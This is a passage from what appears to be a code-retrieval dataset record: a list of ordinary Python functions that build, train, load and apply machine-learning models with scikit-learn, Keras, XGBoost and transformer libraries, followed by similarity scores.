data_shapes=[('data', (1,3,224,224))], label_shapes=mod._label_shapes)\n mod.set_params(arg_params, aux_params, allow_missing=True)\n return mod", "def _model_fn(features, labels, mode, config):\n return _transformer_model_fn(\n features=features,\n labels=labels,\n mode=mode,\n head=head_lib._regression_head_with_mean_squared_error_loss(\n label_dimension=label_dimension,\n weight_column=weight_column,\n loss_reduction=loss_reduction),\n num_layers=num_layers,\n d_model=d_model,\n num_heads=num_heads,\n dff=dff,\n input_vocab_size=input_vocab_size,\n target_vocab_size=target_vocab_size,\n output_size=output_size,\n feature_columns=tuple(feature_columns or []),\n optimizer=optimizer,\n dropout=dropout,\n 
input_layer_partitioner=input_layer_partitioner,\n config=config,\n data_conf=data_conf)", "def apply_sklearn_model(model, data, *args, mode='fit_transform', return_model=False, **kwargs):\n assert mode in ['fit', 'transform', 'fit_transform']\n if type(model) is list:\n models = []\n for i, m in enumerate(model):\n if (i < len(model) - 1) and ('transform' not in mode):\n temp_mode = 'fit_transform'\n else:\n temp_mode = mode\n\n data, m = apply_sklearn_model(m, data, *args, mode=temp_mode, return_model=True, **kwargs)\n models.append(m)\n\n if return_model:\n return data, models\n else:\n return data\n elif type(model) is dict:\n assert all([k in model.keys() for k in ['model', 'args', 'kwargs']]), ValueError(f'invalid model: {model}')\n return apply_sklearn_model(model['model'], data, *[*model['args'], *args], mode=mode, return_model=return_model,\n **update_dict(model['kwargs'], kwargs))\n\n model = get_sklearn_model(model)\n if model is None:\n raise RuntimeError(f'unsupported model: {model}')\n model = apply_defaults(model)(*args, **kwargs)\n\n m = getattr(model, mode)\n transformed_data = m(data)\n if return_model:\n return transformed_data, {'model': model, 'args': args, 'kwargs': kwargs}\n return transformed_data", "def build_model(self, user_defined_model):\n if user_defined_model is None:\n if os.path.exists(self.model_pkl_fname):\n logger.info('Loading model pkl file {}'.format(self.model_pkl_fname))\n model = load_generic(self.model_pkl_fname)\n else:\n logger.info('Building default model based on dihedrals')\n\n # build a lag time of 1 ns for tICA and msm\n # if the stride is too big and we can't do that\n # use 1 frame and report how much that is in ns\n if self.app.meta is not None:\n lag_time = max(1, int(1 / self.timestep))\n logger.info('Using a lag time of {} ns for the tICA and MSM'.format(lag_time * self.timestep))\n else:\n self.timestep = None\n lag_time = 1\n logger.warning('Cannot determine timestep. 
Defaulting to 1 frame.'.format(lag_time))\n model = Pipeline([\n ('feat', DihedralFeaturizer()),\n ('scaler', RobustScaler()),\n ('tICA', tICA(lag_time=lag_time, commute_mapping=True, n_components=10)),\n ('clusterer', MiniBatchKMeans(n_clusters=200)),\n ('msm', MarkovStateModel(lag_time=lag_time, ergodic_cutoff='off', reversible_type=None))\n ])\n else:\n if not isinstance(user_defined_model, Pipeline):\n raise ValueError('model is not an sklearn.pipeline.Pipeline object')\n else:\n logger.info('Using user defined model')\n model = user_defined_model\n return model", "def build_feature_transform():\n\n # These features can be parsed as numeric.\n\n numeric = HEADER.as_feature_indices(\n [\n 'Unnamed: 0', 'V1', 'V2', 'V3', 'V4', 'V5', 'V6', 'V7', 'V8', 'V9',\n 'V10', 'V11', 'V12', 'V13', 'V14', 'V15', 'V16', 'V17', 'V18',\n 'V19', 'V20', 'V21', 'V22', 'V23', 'V24', 'V25', 'V26', 'V27',\n 'V28', 'amt'\n ]\n )\n\n # These features contain a relatively small number of unique items.\n\n categorical = HEADER.as_feature_indices(['amt'])\n\n numeric_processors = Pipeline(\n steps=[\n (\n 'robustimputer',\n RobustImputer(strategy='constant', fill_values=nan)\n )\n ]\n )\n\n categorical_processors = Pipeline(\n steps=[\n ('thresholdonehotencoder', ThresholdOneHotEncoder(threshold=635))\n ]\n )\n\n column_transformer = ColumnTransformer(\n transformers=[\n ('numeric_processing', numeric_processors, numeric\n ), ('categorical_processing', categorical_processors, categorical)\n ]\n )\n\n return Pipeline(\n steps=[\n ('column_transformer', column_transformer\n ), ('robuststandardscaler', RobustStandardScaler())\n ]\n )", "def train(self, model, args):\n if model == self.WORD_DET_RFC:\n return self.train_rfc(args)\n elif model == self.REGRESSION_PARAMS:\n return self.train_bb_reg(args)\n else:\n raise Exception('No model %s exists to train' % model)", "def get_ensemble_model():\n ss = StandardScaler()\n xgb_clf = xgb.XGBClassifier(objective=\"binary:logistic\", random_state=42)\n\n xgb_model = Pipeline(steps=(['scale', ss], ['clf', xgb_clf]))\n\n xgb_model_params = {\n \"clf__colsample_bytree\": uniform(0.5, 0.5), # default 1\n \"clf__gamma\": loguniform(1e-1, 1e3), # default 0\n \"clf__learning_rate\": uniform(0.03, 0.57), # default 0.3\n \"clf__max_depth\": randint(2, 5), # default 3\n \"clf__n_estimators\": randint(10, 50), # default 100\n \"clf__subsample\": uniform(0.5, 0.25), # default 1\n \"clf__min_child_weight\": randint(1, 8) # default 1\n }\n\n # model: classifier with randomised parameter search over nested 3-fold CV (more iters to account for large space)\n ensemble_model = RandomizedSearchCV(xgb_model, xgb_model_params, n_iter=250, cv=3)\n\n return clone(ensemble_model)", "def get_bert_clf():\n model = tf.keras.models.model_from_json(get_object('distilbert_model.json', 'r'))\n model.load_weights(model_dir/'distilbert_weights.hdf5')\n return model", "def buildModel(model_name):\n if model_name == \"resnet50\":\n model = kapp.resnet50.ResNet50(weights=\"imagenet\", include_top=False)\n return model, kapp.resnet50.preprocess_input\n elif model_name == \"vgg16\":\n model = kapp.vgg16.VGG16(weights=\"imagenet\", include_top=False)\n return model, kapp.vgg16.preprocess_input\n elif model_name == 'xception':\n model = kapp.xception.Xception(weights=\"imagenet\", include_top=False)\n return model, kapp.xception.preprocess_input\n elif model_name == 'vgg19':\n model = kapp.vgg19.VGG19(weights=\"imagenet\", include_top=False)\n return model, kapp.vgg19.preprocess_input\n elif model_name == 
'inceptionv3':\n model = kapp.inception_v3.InceptionV3(weights=\"imagenet\", include_top=False)\n return model, kapp.inception_v3.preprocess_input\n elif model_name == 'mobilenet':\n model = kapp.mobilenet.MobileNet(weights=\"imagenet\", include_top=False)\n return model, kapp.mobilenet.preprocess_input\n else:\n raise Exception(\"Unsupported model error\")", "def get_estimator(arguments):\n \n numerical_indices = [1, 2, 4, 5,6,7,8,9,10,11,12,13,14]\n categorical_indices = [0]\n original_indices = list(set(range(59))-set(numerical_indices)-set(categorical_indices))\n \n p1 = make_pipeline(my_module.PositionalSelector(categorical_indices),OneHotEncoder())\n p2 = make_pipeline(my_module.PositionalSelector(numerical_indices),StandardScaler())\n p3 = make_pipeline(my_module.PositionalSelector(original_indices))\n \n feats = FeatureUnion([('categoricals', p1),\n ('numericals', p2),\n ('originals', p3),])\n \n # tolerance and C are expected to be passed as\n # command line argument to task.py\n pipeline = Pipeline([('pre', feats),\n ('estimator', linear_model.LogisticRegression(penalty=\"l2\",\n tol=arguments.tol,\n C = arguments.C,\n solver='lbfgs',\n max_iter=10000))])\n \n # tolerance and C are expected to be passed as\n # command line argument to task.py\n #classifier = linear_model.LogisticRegression(\n # penalty=\"l2\",\n # tol=arguments.tol,\n # C = arguments.C,\n # solver='lbfgs',\n # max_iter=1000\n #)\n \n return pipeline", "def generate_models(clf_library):\n clf_list = []\n for i in clf_library:\n param_dict = i['param_dict']\n dict_list = [dict(izip_longest(param_dict, v)) for v in product(*param_dict.values())]\n clf_list = clf_list+[i['clf'](**param_set) for param_set in dict_list]\n return clf_list", "def apply_model(pfi_fitted_models, x):\n model_params = pickle.load(open(pfi_fitted_models, 'rb'))\n model = MLPClassifier()\n model.set_params(**model_params)\n y = model.predict(x)\n model.predict_proba(x)\n return y", "def build_model(train_inputs,train_labels,model_params,model_mode='classification',\n model_type='naive_bayes'):\n if model_mode == \"classification\":\n if model_type == \"naive_bayes\":\n model = GaussianNB()\n if model_type == \"knn\":\n model = KNeighborsClassifier(n_neighbors=50)\n if model_type == \"svm\":\n model = SVC(kernel='poly', degree =27, coef0 =1, C=5)\n if model_type == \"decision_tree\":\n model = DecisionTreeClassifier(min_samples_split=45,min_samples_leaf=45,criterion=\"gini\")\n #model = RandomForestClassifier(n_estimators=500, n_jobs=-1)\n\n if model_mode == \"regression\":\n if model_type == \"knn\":\n model = KNeighborsRegressor()\n if model_type == \"svm\":\n model = SVR()\n if model_type == \"decision_tree\":\n model = DecisionTreeRegressor()\n\n\n model.fit(train_inputs, train_labels)\n # for name, score in zip(train_inputs.columns,model.feature_importances_):\n # print(name, score)\n\n return model", "def fit_model(X_train, X_test, y_train, y_test, model):\n \n if model == 'LinearRegression':\n \n regressor=LinearRegression()\n regressor.fit(X_train,y_train)\n y_pred =regressor.predict(X_test)\n r2 = r2_score(y_test, y_pred)\n \n elif model == 'Lasso':\n \n lasso = Lasso()\n lasso.fit(X_train, y_train)\n lasso_pred = lasso.predict(X_test)\n r2 = r2_score(y_test, lasso_pred)\n\n elif model == 'Ridge':\n \n ridge = Ridge()\n ridge.fit(X_train, y_train)\n ridge_pred = ridge.predict(X_test)\n r2 = r2_score(y_test, ridge_pred)\n \n \n else:\n model = make_pipeline(PolynomialFeatures(2), LinearRegression())\n model.fit(X_train, y_train)\n 
y_pred = model.predict(X_test)\n r2= r2_score(y_test,y_pred)\n\n\n return r2", "def build(classifier, X, y=None, ngram_range=(1,1), max_features=None):\n if isinstance(classifier, type):\n classifier = classifier()\n\n model = Pipeline([\n ('vectorizer', TfidfVectorizer(\n ngram_range=ngram_range,\n stop_words='english',\n max_features=max_features\n )),\n ('classifier', classifier),\n ])\n\n model.fit(X, y)\n return model", "def build_model(category_names):\n try:\n # initialise columns to be used for data preparation purposes in the model pipeline\n message_col = 0\n\n # build a pipeline containing the feature transformations and estimator\n pipeline = Pipeline([\n\n ('features', ColumnTransformer([\n # apply message transformations\n ('text_pipeline', Pipeline([\n ('vect', CountVectorizer(tokenizer=partial(tokenize))),\n ('tfidf', TfidfTransformer())\n ]), message_col),\n\n ('starting_verb', StartingVerbExtractor(), message_col),\n\n ('category_terms', CategoryTermExtractor(category_names=category_names),\n message_col),\n\n ], remainder='drop')),\n\n # specify the estimator\n ('clf', LabelPowerset(MultinomialNB(fit_prior=True)))\n ])\n\n # parameter grid to be used for grid search\n parameters = {\n 'features__text_pipeline__vect__max_features': [10000],\n 'features__text_pipeline__tfidf__sublinear_tf': [True],\n 'features__text_pipeline__vect__ngram_range': [(1,1), (1,2)],\n 'features__text_pipeline__vect__min_df': [1],\n 'features__text_pipeline__vect__max_df': [.95],\n 'features__text_pipeline__tfidf__smooth_idf': [True],\n 'features__text_pipeline__tfidf__norm': ['l2'],\n 'clf__classifier__alpha': [0.01, 1.]\n }\n\n # perform cross validation using grid search on the pipeline described above\n cv = GridSearchCV(pipeline, param_grid=parameters, cv=5, verbose=2)\n return cv\n except:\n raise Exception(\"Could not build model.\")\n #finally:\n # return cv", "def get_transformer(model_name):\n model_class, tokenizer_class, pretrained_weights = TRANSFORMER_MODELS[model_name]\n model = model_class.from_pretrained(pretrained_weights,\n output_hidden_states=True)\n tokenizer = tokenizer_class.from_pretrained(pretrained_weights)\n\n return model, tokenizer, TRANSFORMER_EMBEDDING_DIMS[model_name]", "def regression_model_dict() -> dict:\n return {\n \"LinearRegression\": createModel(\"LinearRegression\", \"regression\"),\n \"Ridge\": createModel(\"Ridge\", \"regression\"),\n \"Lasso\": createModel(\"Lasso\", \"regression\"),\n \"ElasticNet\": createModel(\"ElasticNet\", \"regression\"),\n \"KNeighborsRegressor\": createModel(\"KNeighborsRegressor\", \"regression\"),\n \"DecisionTreeRegressor\": createModel(\"DecisionTreeRegressor\", \"regression\"),\n \"AdaBoostRegressor\": createModel(\"AdaBoostRegressor\", \"regression\"),\n \"BaggingRegressor\": createModel(\"BaggingRegressor\", \"regression\"),\n \"ExtraTreesRegressor\": createModel(\n \"ExtraTreesRegressor\", \"regression\", n_estimators=100\n ),\n \"GradientBoostingRegressor\": createModel(\n \"GradientBoostingRegressor\", \"regression\"\n ),\n \"RandomForestRegressor\": createModel(\n \"RandomForestRegressor\", \"regression\", n_estimators=100\n ),\n \"XGBoost\": createModel(\"XGBoostRegressor\", \"regression\", num_boost_round=100),\n \"LightGBM\": createModel(\"LightGBMRegressor\", \"regression\", num_boost_round=100),\n }", "def similar_bonds_pipeline():\n pipeline = Pipeline(\n steps=[\n ('scaler', StandardScaler()),\n #('encoder', OneHotEncoder()),\n ('pca', PCA(n_components=3)),\n ('knn', KNN()),\n ]\n )\n return pipeline", "def 
load_model(model, trained_models_dir, image_name):\n# if model == \"keras\":\n if model == 1:\n return load_keras_model(trained_models_dir, image_name)\n# elif model == \"lgb\":\n elif model == 3:\n return load_lgb_model(trained_models_dir, image_name)\n# elif model = \"sklearn\":\n else:\n return load_joblib_model(trained_models_dir, image_name)", "def classifier(model):\n \n model.classifier = nn.Sequential(OrderedDict([\n ('fc1', nn.Linear(model.classifier[0].in_features, 4096)),\n ('fc2', nn.Linear(4096, 102)),\n ('relu', nn.ReLU()),\n ('output', nn.LogSoftmax(dim=1))\n ]))\n return model", "def model(self) -> PipelineModel:\n return self._model", "def build_probe_model(modelpath):\n \n from keras.models import load_model\n model = load_model(modelpath)\n layers = model.layers\n \n outputs = return_concat_layers(layers)\n \n # append final output to keep track of prediction\n outputs.append(model.output)\n\n from keras.models import Model\n probe_model = Model(input=model.input, output=outputs)\n \n return probe_model", "def predict(data, model: str = None, **kwargs):\n\n model_instance = get_model(model)\n log.debug(\"Predict with \" + str(model_instance))\n return model_instance.predict(data, **kwargs)", "def gensim_to_keras(model):\n layer = model.wv.get_keras_embedding()\n return (layer)", "def train_model(x_data, y_data, model_type):\n # def lr model object\n clr = None\n try:\n clr = model_list[model_type]()\n except Exception as e:\n print(e)\n # fit model\n clr.fit(x_data, y_data)\n # save model in pkl file\n try:\n joblib.dump(clr, \"model/\" + model_type + \".pkl\")\n except Exception as e:\n print(e)\n return clr", "def get_model_pipeline_from_file(self, oc):\r\n # Load model related files\r\n model_path = self.config['DATA_PATH'] + self.config['CUSTOMER_NAME'] + '/models/'\r\n\r\n model_file = model_path + self.task + '_' + str(oc) + '_pipeline.joblib'\r\n\r\n if os.path.isfile(model_file):\r\n model = joblib.load(model_file)\r\n return model\r\n return None", "def load_torchtransformers(model_name):\n\n # There are two versions of huggingface, support both\n try:\n import pytorch_transformers\n except ModuleNotFoundError:\n import transformers as pytorch_transformers\n\n if model_name == \"bert\":\n tokenizer = pytorch_transformers.BertTokenizer.from_pretrained('bert-base-uncased')\n model = pytorch_transformers.BertModel.from_pretrained('bert-base-uncased', torchscript=True)\n input_data = torch.tensor([tokenizer.encode(text=\"Here is some text to encode\", add_special_tokens=True)])\n elif model_name == \"transformer_xl\":\n tokenizer = pytorch_transformers.TransfoXLTokenizer.from_pretrained('transfo-xl-wt103')\n model = pytorch_transformers.TransfoXLModel.from_pretrained('transfo-xl-wt103', torchscript=True)\n input_data = torch.tensor([tokenizer.encode(text=\"Here is some text to encode\", add_special_tokens=True)])\n else: \n raise ValueError(f'{model_name} is not supported. 
Unknown model name.')\n\n model = model.eval()\n return model, [input_data]", "def build_model(X_train, Y_train):\n #Choosing a straighforward single tree model to make training tractable in terms of time\n DTC = DecisionTreeClassifier(random_state = 11)\n\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(estimator=DTC))\n ])\n\n parameters = {'clf__estimator__criterion': [\"gini\", \"entropy\"],\n 'clf__estimator__splitter': [\"best\", \"random\"],\n 'clf__estimator__max_depth': randint(3, 6),\n 'clf__estimator__min_samples_split': randint(2,6)}\n\n grid_obj = RandomizedSearchCV(pipeline,parameters,n_iter=5, cv=5 )\n grid_obj.fit(X_train, Y_train)\n\n return grid_obj.best_estimator_", "def model_fn(model_dir):\n with open(os.path.join(model_dir, 'model.pkl'), 'rb') as pickle_file:\n model = pickle.load(pickle_file)\n return model", "def load_model(pickle_file):\n if os.path.isfile(pickle_file) == False:\n return None, None\n \n f = open(pickle_file, \"rb\")\n from_dump = pickle.load(f)\n f.close()\n\n return from_dump['clf'], from_dump['scaler']" ]
[ "0.6688918", "0.64640874", "0.64640874", "0.6416069", "0.6381701", "0.636211", "0.6302781", "0.62598276", "0.62242967", "0.6168712", "0.6149896", "0.6133813", "0.6130566", "0.61174124", "0.6096542", "0.6070486", "0.6065497", "0.60585046", "0.6046623", "0.6042597", "0.603112", "0.5973031", "0.59639597", "0.5930727", "0.5905255", "0.59017104", "0.5893399", "0.5892971", "0.58887047", "0.58774185", "0.5872599", "0.5860333", "0.58281684", "0.58121866", "0.57877827", "0.5759482", "0.5733511", "0.57274324", "0.5717768", "0.57125455", "0.5697244", "0.5694444", "0.56819874", "0.56735337", "0.5646899", "0.56397974", "0.5630489", "0.557741", "0.5562503", "0.5561034", "0.5556652", "0.5555347", "0.55481046", "0.5536343", "0.5531682", "0.5531682", "0.5531543", "0.5526589", "0.5526188", "0.5519003", "0.55118364", "0.5505841", "0.5495894", "0.5453491", "0.5421161", "0.53960806", "0.5377263", "0.5358144", "0.5350142", "0.53472346", "0.5335736", "0.53263307", "0.5295344", "0.5270819", "0.52694255", "0.5269299", "0.52686125", "0.5266199", "0.52576095", "0.5252173", "0.52518183", "0.5250244", "0.5247522", "0.5239901", "0.5236691", "0.5232623", "0.52287096", "0.5227189", "0.5224442", "0.5199644", "0.5193562", "0.5193485", "0.5172847", "0.516841", "0.51591456", "0.51503015", "0.51497704", "0.51467407", "0.51352936", "0.5134363" ]
0.771603
0
Return a Lag wrapper for a pipeline.
def get_lagger(pipe, kwargs):
    from .transforms import LagWrapper
    return LagWrapper(pipe, **kwargs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pipeline(self) -> Pipeline:\n if self._to_pipeline is None:\n raise AttributeError(\n \"pipeline not available because `to_pipeline` was not set on __init__.\"\n )\n return self._to_pipeline(self)", "def get_pipeline(tag=None):\n\n\n data_science_pipeline = (\n # interdiction_baseline_call_pl()\n # + interdiction_baseline_parse_pl()\n #+ interdiction_community_pl()\n #+ interdiction_community_parse_pl()\n #+ dijkstra_prep_paths_pl()\n #+ dijkstra_parse_paths_pl()\n #+ dijkstra_reachable_pl()\n #+ dijkstra_shortest_paths_pl()\n + dijkstra_pypy_pickle_pl()\n + dijkstra_pypy_paths_pl()\n + dijkstra_make_adj_pl()\n #+ dijkstra_opt()\n + dijkstra_flow()\n + sds_counterfactual_pl()\n + supply_interdiction_pl()\n + post_supply_interdiction_pl()\n )\n \n if tag:\n if type(tag)==str:\n return Pipeline([n for n in data_science_pipeline.nodes if tag in n.tags])\n elif type(tag)==list:\n return Pipeline([n for n in data_science_pipeline.nodes if len(n.tags - set(tag)) < len(n.tags)])\n \n else:\n return data_science_pipeline", "def pipeline(args) :\n from pipeliner import create_pipeline\n create_pipeline(args)", "def pipeline(self, pipeline_id):\r\n return pipelines.Pipeline(self, pipeline_id)", "def pipeline(self):\n # gotta avoid circular imports by deferring\n from .pipeline import Pipeline\n return Pipeline().from_source(self._collection)", "def from_pipeline(cls, pipeline, proba=None, repeat=None):\n if proba is None:\n if repeat is None:\n new_p = cls(pipeline=pipeline)\n else:\n if pipeline.num_actions == 1 and pipeline.get_last_action_proba() is None:\n new_p = cls(pipeline=pipeline, repeat=repeat)\n else:\n new_p = cls()\n new_p.append_pipeline(pipeline, repeat=repeat)\n else:\n if pipeline.num_actions == 1 and pipeline.get_last_action_repeat() is None:\n new_p = cls(pipeline=pipeline, proba=proba)\n else:\n new_p = cls()\n new_p.append_pipeline(pipeline, proba=proba)\n return new_p", "def set_pipeline(self):\n pipe_distance = make_pipeline(DistanceTransformer(), RobustScaler())\n pipe_time = make_pipeline(TimeFeaturesEncoder(time_column='pickup_datetime'), OneHotEncoder(handle_unknown='ignore'))\n dist_cols = ['pickup_latitude', 'pickup_longitude', 'dropoff_latitude', 'dropoff_longitude']\n time_cols = ['pickup_datetime']\n feat_eng_bloc = ColumnTransformer([('time', pipe_time, time_cols),\n ('distance', pipe_distance, dist_cols)]\n )\n self.pipeline = Pipeline(steps=[('feat_eng_bloc', feat_eng_bloc),\n ('regressor', RandomForestRegressor())])\n return self.pipeline", "def pipeline():\n\n test_pipeline = (Pipeline()\n .init_variable('current_loss')\n .init_model('model', C('model_class'),\n 'dynamic', C('model_config'))\n .to_array(dtype='float32')\n .train_model('model',\n inputs=B('images'),\n targets=B('labels'),\n outputs='loss',\n save_to=V('current_loss'))\n )\n return test_pipeline", "def create_pipeline(self, train: LAMLDataset) -> LAMLTransformer:\n raise NotImplementedError", "def pipelines(self):\r\n return pipelines.Pipelines(self)", "def get_pipeline(self):\n if hasattr(self, \"pipeline\"):\n return self.pipeline\n steps = [\n # before preprocessor, comes the feature extractor\n ('extractor', TurkishFeatureExtractor()),\n # first the pre-processor\n (\"preprocessor\", TurkishPreprocessor(self.stemmer_name_to_method[self.stemmer_method])),\n (\"vectorizer\", TurkishVectorizer(self.feature_name_to_class[self.feature])),\n # use pca\n # (\"pca\", TruncatedSVD(n_components=20, n_iter=10)),\n (\"adder\", TurkishFeatureAdder(n_components=20, n_iter=10)),\n (\"model\", 
self.model_name_to_class[self.model])\n ]\n self.pipeline = Pipeline(steps)\n return self.pipeline", "def process_pipeline(frame, keep_state=True):\n\n global line_lt, line_rt, processed_frames\n\n # undistort the image using coefficients found in calibration\n undistorted_img = undistort(frame, mtx, dist)\n\n # binarize the frame and highlight lane lines\n binarized_img = binarize(undistorted_img)\n\n # perspective transform to obtain bird's eye view\n birdeye_img, matrix, inversed_matrix = birdeye(binarized_img, visualise=False)\n\n # 2 order polynomial curve fit onto lane lines found\n if processed_frames > 0 and keep_state and line_lt.detected and line_rt.detected:\n find_lane_by_previous_fits(birdeye_img, line_lt, line_rt, visualise=False)\n else:\n find_lane_by_sliding_windows(birdeye_img, line_lt, line_rt, n_windows=9, visualise=False)\n\n # compute offset in meter from center of the lane\n offset_meter = offset_from_lane_center(line_lt, line_rt, frame_width=frame.shape[1])\n\n # draw the surface enclosed by lane lines back onto the original frame\n blend_on_road = draw_back_onto_the_road(undistorted_img, inversed_matrix, line_lt, line_rt, keep_state)\n mean_curvature_meter = np.mean([line_lt.curvature_meter, line_rt.curvature_meter])\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(blend_on_road, 'Curvature radius: {:.02f}m'.format(mean_curvature_meter), (60, 60), font, 1,\n (255, 255, 255), 2)\n cv2.putText(blend_on_road, 'Offset from center: {:.02f}m'.format(offset_meter), (60, 90), font, 1,\n (255, 255, 255), 2)\n\n processed_frames += 1\n\n return blend_on_road", "def construct(args,\n **kwargs):\n kw = parse_args(args)\n kw.update(kwargs)\n return (build_pipeline(**kw),\n kw)", "def make_pipeline():\r\n\r\n # Custom universe containing only desired assets (stocks with flag data)\r\n universe = StaticSids(my_stocks)\r\n\r\n return Pipeline(\r\n columns={\r\n #'flag_type': algo_data_full.flag_type.latest,\r\n #'flag_price': algo_data_full.flag_price.latest,\r\n #'end_flag_date': algo_data_full.end_flag_date.latest,\r\n #'end_flag_price': algo_data_full.end_flag_price.latest,\r\n 'up_flags': flag_counts.up.latest,\r\n 'down_flags': flag_counts.down.latest,\r\n 'up_ratio': up_ratios_2.up_ratio.latest,\r\n 'close': USEquityPricing.close.latest,\r\n },\r\n screen=universe\r\n )", "def make_pipeline():\n \n # Base universe set to the QTradableStocksUS\n base_universe = QTradableStocksUS()#Q500US()\n base_universe = (base_universe & Q500US())\n base_universe = (base_universe & Fundamentals.market_cap.latest.top(150))\n \n # Factor of yesterday's close price.\n #yesterday_close = USEquityPricing.close.latest\n \n pipe = Pipeline(\n columns={\n #'close': yesterday_close,\n 'sector': Sector(),\n },\n screen=base_universe\n )\n return pipe", "def pipeline(self):\n return self._pipeline", "def pipeline(self):\n return self._pipeline", "def create_fake_pipeline(*_args, **_kwargs):\n return Pipeline(\n [\n node(match.clean_match_data, \"fake_match_data\", \"clean_match_data\"),\n node(\n common.convert_match_rows_to_teammatch_rows,\n \"clean_match_data\",\n \"match_data_b\",\n ),\n node(match.add_out_of_state, \"match_data_b\", \"match_data_c\"),\n node(match.add_travel_distance, \"match_data_c\", \"match_data_d\"),\n node(match.add_result, \"match_data_d\", \"match_data_e\"),\n node(match.add_margin, \"match_data_e\", \"match_data_f\"),\n node(\n match.add_shifted_team_features(\n shift_columns=[\n \"score\",\n \"oppo_score\",\n \"result\",\n \"margin\",\n \"team_goals\",\n 
\"team_behinds\",\n ]\n ),\n \"match_data_f\",\n \"match_data_g\",\n ),\n node(match.add_cum_win_points, \"match_data_g\", \"match_data_h\"),\n node(match.add_win_streak, \"match_data_h\", \"match_data_i\"),\n ]\n )", "def make_pipeline():\n universe = TradableStocksUS('Real Estate') | TradableStocksUS('Utilities') | \\\n TradableStocksUS('Consumer Staples') | TradableStocksUS('Technology') | \\\n TradableStocksUS('Financials') | TradableStocksUS('Energy') | \\\n TradableStocksUS('Materials') | TradableStocksUS('Health Care') | \\\n TradableStocksUS('Industrials') | TradableStocksUS('Consumer Discretionary') | \\\n TradableStocksUS('Communications')\n\n roic = shfd.slice(dimension='MRT', period_offset=0).ROIC.latest\n ebit = shfd.slice(dimension='MRQ', period_offset=0).EBIT.latest\n ev = shfd.slice(dimension='MRQ', period_offset=0).EV.latest\n volatility = AnnualizedVolatility(window_length=100)\n value = ebit / ev\n\n roic_rank = roic.rank(mask=universe)\n value_rank = value.rank(mask=universe)\n volatility_rank = volatility.rank(mask=universe, ascending=False)\n\n spy_ma100_price = SMA(inputs=[USEquityPricing.close], \n window_length=100)[algo.sid(\"FIBBG000BDTBL9\")]\n spy_price = USEquityPricing.close.latest[algo.sid(\"FIBBG000BDTBL9\")]\n\n momentum_score = MomentumScore()\n\n overall_rank = roic_rank + value_rank + volatility_rank\n\n # seven_month_returns = Returns(window_length=148, mask=universe,)\n # one_month_returns = Returns(window_length=30, mask=universe,)\n\n pipeline = Pipeline(\n columns={\n 'stock' : master.SecuritiesMaster.Symbol.latest,\n 'sid': master.SecuritiesMaster.Sid.latest,\n 'sector' : master.SecuritiesMaster.usstock_Sector.latest,\n 'average_dollar_volume': AverageDollarVolume(window_length=200),\n 'price': EquityPricing.close.latest,\n 'volume': EquityPricing.volume.latest,\n 'roic' : roic,\n 'value' : value,\n 'volatility': volatility,\n 'roic_rank' : roic_rank,\n 'value_rank' : value_rank,\n 'momentum': momentum_score,\n 'momentum_decile': momentum_score.deciles(),\n 'volatility_decile' : volatility.deciles(),\n 'overall_rank' : overall_rank,\n 'overall_rank_decile': overall_rank.deciles(),\n 'trend_filter': spy_price > spy_ma100_price,\n # 'returns' : one_month_returns - seven_month_returns\n }, \n screen = universe\n )\n\n return pipeline", "def pipeline(\n self,\n name: str,\n description: Optional[str] = None,\n labels: Optional[Sequence[PipelineLabel]] = None,\n ) -> \"Directory\":\n _args = [\n Arg(\"name\", name),\n Arg(\"description\", description, None),\n Arg(\"labels\", labels, None),\n ]\n _ctx = self._select(\"pipeline\", _args)\n return Directory(_ctx)", "def _create_pipeline(self) -> codepipeline.Pipeline:\n source_output = codepipeline.Artifact()\n build_output = codepipeline.Artifact()\n return codepipeline.Pipeline(\n self,\n 'Pipeline',\n stages=[\n self._create_source_stage('Source', source_output),\n # self._create_image_build_stage(\n # 'Build', source_output, build_output),\n # self._create_deploy_stage('Deploy', build_output)\n ]\n )", "def pipelines(self):\n return PipelineManager(session=self._session)", "def pipeline(ctx):\n asyncio.run(pipeline_impl(ctx.obj[\"config\"]))", "def get_pipeline_driver(module_name, passed_args=None):\n _imports = __import__(module_name, fromlist=[\"get_pipeline\"])\n kwargs = convert_struct(passed_args)\n return _imports.get_pipeline(**kwargs)", "def pipeline(\n self,\n name: str,\n description: Optional[str] = None,\n labels: Optional[Sequence[PipelineLabel]] = None,\n ) -> \"Container\":\n _args = 
[\n Arg(\"name\", name),\n Arg(\"description\", description, None),\n Arg(\"labels\", labels, None),\n ]\n _ctx = self._select(\"pipeline\", _args)\n return Container(_ctx)", "def get_refinement_pipeline():\n node_scaling = PrimaryNode('scaling')\n node_logit = SecondaryNode('logit', nodes_from=[node_scaling])\n node_decompose = SecondaryNode('class_decompose', nodes_from=[node_logit, node_scaling])\n node_rfr = SecondaryNode('rfr', nodes_from=[node_decompose])\n node_xgboost = SecondaryNode('xgboost', nodes_from=[node_rfr, node_logit])\n\n pipeline = Pipeline(node_xgboost)\n return pipeline", "def set_pipeline(self):\n dist_pipe = Pipeline([\n ('dist_trans', DistanceTransformer()),\n ('stdscaler', StandardScaler())\n ])\n\n time_pipe = Pipeline([\n ('time_enc', TimeFeaturesEncoder('pickup_datetime')),\n ('ohe', OneHotEncoder(handle_unknown='ignore'))\n ])\n\n preproc_pipe = ColumnTransformer([\n ('distance', dist_pipe, [\"pickup_latitude\", \"pickup_longitude\", 'dropoff_latitude', 'dropoff_longitude']),\n ('time', time_pipe, ['pickup_datetime'])\n ], remainder=\"drop\")\n\n pipe = Pipeline([\n ('preproc', preproc_pipe),\n ('linear_model', LinearRegression())\n ])\n return pipe", "def make_pipeline(slam, settings):\n\n pipeline_name = \"pipeline_source[inversion]\"\n\n \"\"\"\n This pipeline is tagged according to whether:\n\n 1) Hyper-fitting settings (galaxies, sky, background noise) are used.\n 2) The lens galaxy mass model includes an `ExternalShear`.\n 3) The `Pixelization` and `Regularization` scheme of the pipeline (fitted in phases 3 & 4).\n \"\"\"\n\n path_prefix = f\"{slam.path_prefix}/{pipeline_name}/{slam.source_inversion_tag}\"\n\n \"\"\"\n Phase 1: Fit the `Pixelization` and `Regularization`, where we:\n\n 1) Fix the lens mass model to the `MassProfile`'s inferred by the previous pipeline.\n \"\"\"\n\n phase1 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[1]_mass[fixed]_source[inversion_magnification_initialization]\",\n n_live_points=30,\n 